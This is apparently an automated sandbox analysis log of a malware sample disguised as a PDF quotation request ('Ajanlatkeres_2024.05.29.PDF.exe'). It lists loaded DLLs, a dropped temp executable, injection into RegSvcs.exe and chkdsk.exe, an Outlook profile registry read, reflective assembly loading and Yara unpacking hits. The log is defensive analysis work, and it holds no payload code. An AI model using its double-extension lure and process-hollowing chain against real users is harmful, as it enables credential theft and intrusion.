Source: C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\YLc7afPlL4RjCeK.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\YLc7afPlL4RjCeK.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\YLc7afPlL4RjCeK.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\YLc7afPlL4RjCeK.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\YLc7afPlL4RjCeK.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\YLc7afPlL4RjCeK.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\YLc7afPlL4RjCeK.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\YLc7afPlL4RjCeK.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\YLc7afPlL4RjCeK.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\YLc7afPlL4RjCeK.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\YLc7afPlL4RjCeK.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\YLc7afPlL4RjCeK.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\YLc7afPlL4RjCeK.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\YLc7afPlL4RjCeK.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\YLc7afPlL4RjCeK.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\YLc7afPlL4RjCeK.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\YLc7afPlL4RjCeK.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\YLc7afPlL4RjCeK.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\YLc7afPlL4RjCeK.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\YLc7afPlL4RjCeK.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\YLc7afPlL4RjCeK.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\YLc7afPlL4RjCeK.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\YLc7afPlL4RjCeK.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\YLc7afPlL4RjCeK.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\YLc7afPlL4RjCeK.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\YLc7afPlL4RjCeK.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\YLc7afPlL4RjCeK.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\YLc7afPlL4RjCeK.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\YLc7afPlL4RjCeK.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\YLc7afPlL4RjCeK.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\YLc7afPlL4RjCeK.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\YLc7afPlL4RjCeK.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\YLc7afPlL4RjCeK.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\YLc7afPlL4RjCeK.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe	Section loaded: ulib.dll
Source: C:\Windows\SysWOW64\chkdsk.exe	Section loaded: ifsutil.dll
Source: C:\Windows\SysWOW64\chkdsk.exe	Section loaded: devobj.dll
Source: C:\Windows\SysWOW64\chkdsk.exe	Section loaded: wininet.dll

Source: C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook

.NET source code contains potential unpacker

Source: Ajanlatkeres_2024.05.29.PDF.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: Ajanlatkeres_2024.05.29.PDF.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: Ajanlatkeres_2024.05.29.PDF.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: chkdsk.pdbGCTL source: RegSvcs.exe, 00000013.00000002.1394975056.0000000000C18000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000013.00000002.1394558501.0000000000B60000.00000040.10000000.00040000.00000000.sdmp, chkdsk.exe, 00000015.00000002.3742534236.0000000000BA0000.00000040.80000000.00040000.00000000.sdmp
Source:	Binary string: Eusz.pdb source: Ajanlatkeres_2024.05.29.PDF.exe
Source:	Binary string: jORR.pdbSHA2563 source: YLc7afPlL4RjCeK.exe.6.dr
Source:	Binary string: chkdsk.pdb source: RegSvcs.exe, 00000013.00000002.1394975056.0000000000C18000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000013.00000002.1394558501.0000000000B60000.00000040.10000000.00040000.00000000.sdmp, chkdsk.exe, 00000015.00000002.3742534236.0000000000BA0000.00000040.80000000.00040000.00000000.sdmp
Source:	Binary string: RegSvcs.pdb, source: RegSvcs.exe, 00000013.00000002.1393977019.0000000000472000.00000002.00000001.01000000.0000000D.sdmp
Source:	Binary string: wntdll.pdbUGP source: RegSvcs.exe, 00000013.00000002.1395457023.0000000000ED0000.00000040.00001000.00020000.00000000.sdmp, chkdsk.exe, 00000015.00000002.3751618566.0000000005450000.00000040.00001000.00020000.00000000.sdmp, chkdsk.exe, 00000015.00000003.1394168499.00000000050FE000.00000004.00000020.00020000.00000000.sdmp, chkdsk.exe, 00000015.00000002.3751618566.00000000055EE000.00000040.00001000.00020000.00000000.sdmp, chkdsk.exe, 00000015.00000003.1396638681.00000000052A0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: RegSvcs.exe, RegSvcs.exe, 00000013.00000002.1395457023.0000000000ED0000.00000040.00001000.00020000.00000000.sdmp, chkdsk.exe, chkdsk.exe, 00000015.00000002.3751618566.0000000005450000.00000040.00001000.00020000.00000000.sdmp, chkdsk.exe, 00000015.00000003.1394168499.00000000050FE000.00000004.00000020.00020000.00000000.sdmp, chkdsk.exe, 00000015.00000002.3751618566.00000000055EE000.00000040.00001000.00020000.00000000.sdmp, chkdsk.exe, 00000015.00000003.1396638681.00000000052A0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: jORR.pdb source: YLc7afPlL4RjCeK.exe.6.dr
Source:	Binary string: RegSvcs.pdb source: RegSvcs.exe, RegSvcs.exe, 00000013.00000002.1393977019.0000000000472000.00000002.00000001.01000000.0000000D.sdmp
Source:	Binary string: Eusz.pdbSHA256 source: Ajanlatkeres_2024.05.29.PDF.exe

Data Obfuscation

Source: Ajanlatkeres_2024.05.29.PDF.exe, MsgBx.cs	.Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
Source: YLc7afPlL4RjCeK.exe.6.dr, MsgBx.cs	.Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
Source: 6.2.Ajanlatkeres_2024.05.29.PDF.exe.7200000.8.raw.unpack, jUedmmIQbjpaEiUIOJ.cs	.Net Code: QayV6GgIwS System.Reflection.Assembly.Load(byte[])
Source: 6.2.Ajanlatkeres_2024.05.29.PDF.exe.412cbd0.5.raw.unpack, jUedmmIQbjpaEiUIOJ.cs	.Net Code: QayV6GgIwS System.Reflection.Assembly.Load(byte[])
Source: 6.2.Ajanlatkeres_2024.05.29.PDF.exe.7be0000.9.raw.unpack, RLhDAEYwfjHvjWVq5a.cs	.Net Code: Gc3JujKCKLERSog4UEp System.Reflection.Assembly.Load(byte[])
Source: 6.2.Ajanlatkeres_2024.05.29.PDF.exe.2ec5d84.1.raw.unpack, RLhDAEYwfjHvjWVq5a.cs	.Net Code: Gc3JujKCKLERSog4UEp System.Reflection.Assembly.Load(byte[])
Source: 14.2.YLc7afPlL4RjCeK.exe.7730000.8.raw.unpack, BVvQkKGnivA0dbGJTm.cs	.Net Code: ACU8sMjsWo System.Reflection.Assembly.Load(byte[])

Yara detected aPLib compressed binary

Source: Yara match	File source: 6.2.Ajanlatkeres_2024.05.29.PDF.exe.40d11b0.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.Ajanlatkeres_2024.05.29.PDF.exe.40eb1d0.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.Ajanlatkeres_2024.05.29.PDF.exe.40d11b0.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.Ajanlatkeres_2024.05.29.PDF.exe.40eb1d0.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.Ajanlatkeres_2024.05.29.PDF.exe.2f44e1a.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000006.00000002.1326006621.00000000040EB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.1326006621.000000000406E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.1324018301.0000000002F5B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.3739899679.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Ajanlatkeres_2024.05.29.PDF.exe PID: 2820, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 7532, type: MEMORYSTR

Source: C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exe	Code function: 6_2_0136E980 pushad ; retf	6_2_0136E989
Source: C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exe	Code function: 6_2_07296696 push es; retf	6_2_072966A7
Source: C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exe	Code function: 6_2_0729051E push ds; ret	6_2_0729051F
Source: C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exe	Code function: 6_2_07296160 push esp; ret	6_2_07296165
Source: C:\Users\user\AppData\Local\Temp\YLc7afPlL4RjCeK.exe	Code function: 14_2_0161E980 pushad ; retf	14_2_0161E989
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 15_2_00402AC0 push eax; ret	15_2_00402AD4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 15_2_00402AC0 push eax; ret	15_2_00402AFC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00417184 push edi; iretd	19_2_00417185
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00417294 push eax; ret	19_2_00417298
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00416CE4 push esi; retf	19_2_00416CE6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_0041E4F8 push edi; iretd	19_2_0041E4F9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_0041D4B5 push eax; ret	19_2_0041D508
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_0041D56C push eax; ret	19_2_0041D572
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_0041D502 push eax; ret	19_2_0041D508
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_0041D50B push eax; ret	19_2_0041D572
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00ED225F pushad ; ret	19_2_00ED27F9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00ED27FA pushad ; ret	19_2_00ED27F9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00ED283D push eax; iretd	19_2_00ED2858
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00F009AD push ecx; mov dword ptr [esp], ecx	19_2_00F009B6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_00ED1368 push eax; iretd	19_2_00ED1369
Source: C:\Windows\explorer.exe	Code function: 20_2_101E4B1E push esp; retn 0000h	20_2_101E4B1F
Source: C:\Windows\explorer.exe	Code function: 20_2_101E4B02 push esp; retn 0000h	20_2_101E4B03
Source: C:\Windows\explorer.exe	Code function: 20_2_101E49B5 push esp; retn 0000h	20_2_101E4AE7
Source: C:\Windows\explorer.exe	Code function: 20_2_107B69B5 push esp; retn 0000h	20_2_107B6AE7
Source: C:\Windows\explorer.exe	Code function: 20_2_107B6B1E push esp; retn 0000h	20_2_107B6B1F
Source: C:\Windows\explorer.exe	Code function: 20_2_107B6B02 push esp; retn 0000h	20_2_107B6B03
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 21_2_054527FA pushad ; ret	21_2_054527F9
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 21_2_0545225F pushad ; ret	21_2_054527F9
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 21_2_054809AD push ecx; mov dword ptr [esp], ecx	21_2_054809B6
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 21_2_0545283D push eax; iretd	21_2_05452858
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 21_2_05451365 push eax; iretd	21_2_05451369

Source: Ajanlatkeres_2024.05.29.PDF.exe	Static PE information: section name: .text entropy: 7.9600603885333365
Source: YLc7afPlL4RjCeK.exe.6.dr	Static PE information: section name: .text entropy: 7.964698283967239

